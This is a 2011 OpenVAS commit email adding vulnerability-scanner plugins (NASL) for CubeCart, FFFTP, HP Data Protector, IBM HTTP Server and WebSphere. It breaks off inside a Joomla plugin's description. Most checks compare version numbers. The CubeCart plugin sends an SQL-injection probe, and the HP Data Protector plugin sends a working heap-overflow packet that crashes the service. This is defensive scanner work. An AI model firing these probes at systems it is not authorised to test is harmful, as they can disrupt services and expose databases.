[Openvas-commits] r12045 - trunk/openvas-plugins/scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Tue Nov 8 16:46:31 CET 2011


Author: antu123
Date: 2011-11-08 16:46:26 +0100 (Tue, 08 Nov 2011)
New Revision: 12045

Added:
   trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl
   trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl
Log:
Added new plugins

Added: trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_cubecart_mult_xss_n_sql_inj_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,115 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cubecart_mult_xss_n_sql_inj_vuln.nasl 17767 2011-11-04 11:10:29 nov $
+#
+# CubeCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802199);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2010-4903");
+  script_bugtraq_id(43114);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 11:10:29 +0200 (Fri, 04 Nov 2011)");
+  script_name("CubeCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities");
+  desc = "
+  Overview: This host is running CubeCart and is prone to SQL injection and
+  multiple cross-site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - Input passed to the 'amount', 'cartId', 'email', 'transId', and
+    'transStatus' parameters in 'modules/gateway/WorldPay/return.php' is not
+    properly sanitised before being returned to the user.
+  - Input passed via the 'searchStr' parameter to index.php
+    (when '_a' is set to 'viewCat') is not properly sanitised before being used
+    in a SQL query.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary HTML and
+  script code in a user's browser session in context of an affected site and
+  manipulate SQL queries by injecting arbitrary SQL code.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  CubeCart version 4.3.3
+
+  Fix: Upgrade to CubeCart version 4.4.2 or later
+  For updates refer, http://www.cubecart.com/tour
+
+  References:
+  http://secunia.com/advisories/41352
+  http://www.securityfocus.com/archive/1/archive/1/513572/100/0/threaded
+  http://www.acunetix.com/blog/web-security-zone/articles/sql-injection-xss-cubecart-4-3-3/ ";
+
+  script_description(desc);
+  script_summary("Check if CubeCart is vulnerable for SQL injection attack");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+foreach dir (make_list("/cart", "/store", "/shop", "/cubecart", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: string(dir, "/admin.php?_g=login&goto=%2Fcubecart%2F" +
+                        "admin.php"), port:port);
+  res = http_keepalive_send_recv(port:port,data:req);
+
+  ## Confirm the Application
+  if("<title>CubeCart" >< res)
+  {
+    ## Try attack and check the response to confirm vulnerability
+    url = string(dir, "/index.php?searchStr='&_a=viewCat&Submit=Go");
+
+    if(http_vuln_check(port:port, url:url, pattern:"You have an error " +
+              "in your SQL syntax;", extra_check:"> SELECT id FROM cube_" +
+              "CubeCart_search WHERE searchstr="))
+    {
+      security_hole(port);
+      exit(0);
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ffftp_untrusted_search_path_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ffftp_untrusted_search_path_vuln.nasl 18409 2011-11-08 16:10:17 nov $
+#
+# FFFTP Untrusted Search Path Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802505);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-3991");
+  script_bugtraq_id(50412);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"creation_date", value:"2011-11-08 16:10:17 +0530 (Tue, 08 Nov 2011)");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_name("FFFTP Untrusted Search Path Vulnerability (Windows)");
+  desc = "
+  Overview: The host is running FFFTP and is prone to untrusted search path
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error in application, loading executables
+  (e.g. notepad.exe) in an insecure manner.
+
+  Impact:
+  Successful exploitation could allow attackers to execute an arbitrary program
+  in the context of the user running the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  FFFTP version 1.98a and prior on windows
+
+  Fix: Upgrade to the FFFTP version 1.98b or later,
+  For updates refer, http://sourceforge.jp/projects/ffftp/releases/
+
+  References:
+  http://secunia.com/advisories/46649
+  http://xforce.iss.net/xforce/xfdb/71020
+  http://jvn.jp/en/jp/JVN62336482/index.html
+  http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-000091.html ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Check the version of FFFTP");
+  script_category(ACT_GATHER_INFO);
+  script_family("General");
+  script_dependencies("gb_ffftp_detect.nasl");
+  script_require_keys("FFFTP/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+ftpVer = get_kb_item("FFFTP/Ver");
+if(!ftpVer){
+  exit(0);
+}
+
+## Check for FFFTP version <= 1.98a (1.98.1.0)
+if(version_is_less_equal(version:ftpVer, test_version:"1.98.1.0")){
+  security_hole(0);
+}

Added: trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_hp_data_protector_media_operations_bof_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,118 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_hp_data_protector_media_operations_bof_vuln.nasl 18407 2011-11-08 11:11:11Z nov $
+#
+# HP Data Protector Media Operations Heap Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802269);
+  script_version("$Revision: $");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"creation_date", value:"2011-11-08 11:11:11 +0530 (Tue, 08 Nov 2011)");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_name("HP Data Protector Media Operations Heap Buffer Overflow Vulnerability");
+  desc = "
+  Overview: This host is running HP Data Protector Media Operations and is
+  prone to buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a boundary error when processing large size
+  packets. This can be exploited to cause a heap-based buffer overflow via
+  a specially crafted packet sent to port 19813.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  within the context of the application or cause a denial of service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  HP Data Protector Media Operations versions 6.20 and prior.
+
+  Fix: No solution or patch is available as on 08th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer,
+  http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920
+
+  References:
+  http://osvdb.org/show/osvdb/76842
+  https://secunia.com/advisories/46688
+  http://aluigi.altervista.org/adv/hpdpmedia_2-adv.txt
+  http://packetstormsecurity.org/files/106591/hpdpmedia_2-adv.txt ";
+
+  script_description(desc);
+  script_summary("Determine HP Data Protector Media Operations Buffer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("find_service.nes");
+  script_require_ports(19813);
+  exit(0);
+}
+
+## Default Port
+port = 19813;
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Open TCP Socket
+soc = open_sock_tcp(port);
+if(!soc){
+  exit(0);
+}
+
+## Check Banner And Confirm Application
+res = recv(socket:soc, length:512);
+if("MediaDB.4DC" >!< res)
+{
+  close(soc);
+  exit(0);
+}
+
+## Building Exploit
+head = raw_string(0x03, 0x00, 0x00, 0x01, 0xff, 0xff, 0xf0, 0x00, 0x01, 0x02,
+                  0x03, 0x04, 0x04);
+junk = crap(data:"a", length: 65536);
+
+## Sending Exploit
+send = send(socket:soc, data: head + junk);
+close(soc);
+
+## Waiting
+sleep(3);
+
+## Try to Open Socket
+if(!soc1 =  open_sock_tcp(port))
+{
+  security_hole(port);
+  exit(0);
+}
+
+## Confirm Server is still alive and responding
+if(! res = recv(socket:soc1, length:512)){
+  security_hole(port);
+}
+close(soc1);

Added: trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_http_server_mult_xss_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_http_server_mult_xss_vuln.nasl 18222 2011-11-03 12:12:12Z nov $
+#
+# IBM HTTP Server Multiple Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801996);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-1360");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 19:48:57 +0530 (Tue, 08 Nov 2011)");
+  script_name("IBM HTTP Server Multiple Cross Site Scripting Vulnerabilities");
+  desc = "
+  Overview: This host is running IBM HTTP Server and is prone to multiple cross
+  site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to improper validation of user-supplied input
+  by a documentation page located in the 'manual/ibm' sub directories. That
+  allows attackers to execute arbitrary HTML and script code in a user's
+  browser session in the context of an affected site.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM HTTP Server version 2.0.47 and prior.
+
+  Fix: Apply the following patch,
+  http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D600&uid=swg21502580
+
+  *****
+  NOTE: Please ignore this warning if the above mentioned patch is already applied.
+  *****
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/69656
+  http://www-01.ibm.com/support/docview.wss?uid=swg21502580
+  http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D600&uid=swg21502580 ";
+
+  script_description(desc);
+  script_summary("Check the version of IBM HTTP Server is vulnerable to Cross-Site Scripting");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("http_version.nasl");
+  script_require_ports("Services/www", 80, 8880, 8008);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get the HTTP ports
+port = get_http_port(default:80);
+
+## check the port status
+if(get_port_state(port))
+{
+  ## Get the Server banner
+  ibmWebSer = get_http_banner(port);
+
+  # Confirm the IBM HTTP Server
+  if("Server: IBM_HTTP_Server" >< ibmWebSer)
+  {
+    ## Check for the  BM HTTP Server version.
+    ver = eregmatch(pattern:"IBM_HTTP_Server/([0-9.]+)", string:ibmWebSer);
+    if(ver[1])
+    {
+      if(version_is_less_equal(version:ver[1], test_version:"2.0.47"))
+      {
+        security_warning(port);
+        exit(0);
+      }
+    }
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_admin_console_xss_vuln.nasl 18216 2011-11-04 13:13:13Z nov $
+#
+# IBM WebSphere Application Server Admin Console Cross-site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801999);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2009-2748");
+  script_bugtraq_id(37015);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 14:37:49 +0530 (Fri, 04 Nov 2011)");
+  script_name("IBM WebSphere Application Server Admin Console Cross-site Scripting Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to cross-site scripting vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper validation of user-supplied input in the
+  Administration Console, which allows the remote attacker to inject malicious
+  script into a Web page.
+
+  Impact:
+  Successful exploitation will let remote attackers to inject malicious script
+  into a Web page. Further an attacker could use this vulnerability to steal
+  the victim's cookie-based authentication credentials.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server (WAS) version 7.1 before 7.0.0.7
+  IBM WebSphere Application Server (WAS) version 6.1 before 6.1.0.29
+
+  Fix:
+  For WebSphere Application Server 6.1:
+  Apply the latest Fix Pack (6.1.0.29 or later) or APAR PK92057
+
+  For WebSphere Application Server 7.1:
+  Apply the latest Fix Pack (7.0.0.7 or later) or APAR PK92057
+
+  For Updates refer, http://www.ibm.com/support/docview.wss?uid=swg1PK92057
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/54229
+  http://www.ibm.com/support/docview.wss?uid=swg1PK99481
+  http://www.ibm.com/support/docview.wss?uid=swg1PK92057 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_in_range(version: vers, test_version: "7.0", test_version2: "7.0.0.6") ||
+   version_in_range(version: vers, test_version: "6.1", test_version2: "6.1.0.28")) {
+  security_warning(port:port);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_admin_console_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl 18216 2011-11-04 13:13:13Z nov $
+#
+# IBM WebSphere Application Server JNDI information disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802400);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2009-2747");
+  script_bugtraq_id(37355);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 15:09:13 +0530 (Fri, 04 Nov 2011)");
+  script_name("IBM WebSphere Application Server JNDI information disclosure Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to information disclosure vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in the Naming and Directory Interface (JNDI)
+  implementation. It does not properly restrict access to UserRegistry object
+  methods, which allows remote attackers to obtain sensitive information via a
+  crafted method call.
+
+  Impact:
+  Successful exploitation will let remote unauthorized attackers to access
+  or view files or obtain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.39,
+  6.1 before 6.1.0.29, and 7.0 before 7.0.0.7
+
+  Fix:
+  For WebSphere Application Server 6.0:
+  Apply the latest Fix Pack (6.0.2.39 or later) or APAR PK91414
+
+  For WebSphere Application Server 6.1:
+  Apply the latest Fix Pack (6.1.0.29 or later) or APAR PK91414
+
+  For WebSphere Application Server 7.1:
+  Apply the latest Fix Pack (7.0.0.7 or later) or APAR PK91414
+
+  For updates refer, http://www.ibm.com/support/docview.wss?uid=swg1PK91414
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/54228
+  http://www.ibm.com/support/docview.wss?uid=swg1PK99480
+  http://www.ibm.com/support/docview.wss?uid=swg1PK91414 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_in_range(version: vers, test_version: "7.0", test_version2: "7.0.0.6") ||
+   version_in_range(version: vers, test_version: "6.0", test_version2: "6.0.2.38") ||
+   version_in_range(version: vers, test_version: "6.1", test_version2: "6.1.0.28")) {
+  security_warning(port:port);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_jndi_imp_info_disclosure_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ibm_was_jsf_info_disclosure_vuln.nasl 18216 2011-11-03 13:13:13Z nov $
+#
+# IBM WebSphere Application Server JSF Application Information Disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(801998);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-1368");
+  script_bugtraq_id(50463);
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-03 18:00:39 +0530 (Thu, 03 Nov 2011)");
+  script_name("IBM WebSphere Application Server JSF Application Information Disclosure Vulnerability");
+  desc = "
+  Overview: The host is running IBM WebSphere Application Server and is prone
+  to information disclosure vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper handling of requests in 'JSF' applications.
+  A remote attacker could gain unauthorized access to view files on the host.
+
+  Impact:
+  Successful exploitation will let remote unauthorized attackers to access
+  or view files or obtain sensitive information.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM WebSphere Application Server versions 8.x before 8.0.0.1
+
+  Fix: Apply the latest Fix Pack (8.0.0.1 or later) or APAR PM45992
+  http://www-01.ibm.com/support/docview.wss?uid=swg21474220
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/70168
+  http://www-01.ibm.com/support/docview.wss?uid=swg1PM45992
+  http://www-01.ibm.com/support/docview.wss?uid=swg24030916 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_is_equal(version: vers, test_version: "8.0.0.0")){
+  security_warning(port:port);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,105 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl 18227 2011-11-04 12:12:12 nov $
+#
+# Joomla! Barter Sites 'com_listing' Component 'category_id' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802268);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 12:12:12 +0530 (Fri, 04 Nov 2011)");
+  script_bugtraq_id(50021);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Joomla! Barter Sites 'com_listing' Component 'category_id' Parameter SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running Joomla! Barter Sites component and is prone to
+  SQL injection vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper validation of user-supplied input via the
+  'category_id' parameter to index.php (when 'option' is set to 'com_listing'
+  and 'task' is set to 'browse'), which allows attacker to manipulate SQL
+  queries by injecting arbitrary SQL code.
+
+  Impact:
+  Successful exploitation will let attackers to cause SQL Injection attack and
+  gain sensitive information.
+
+  Impact Level: Application.
+
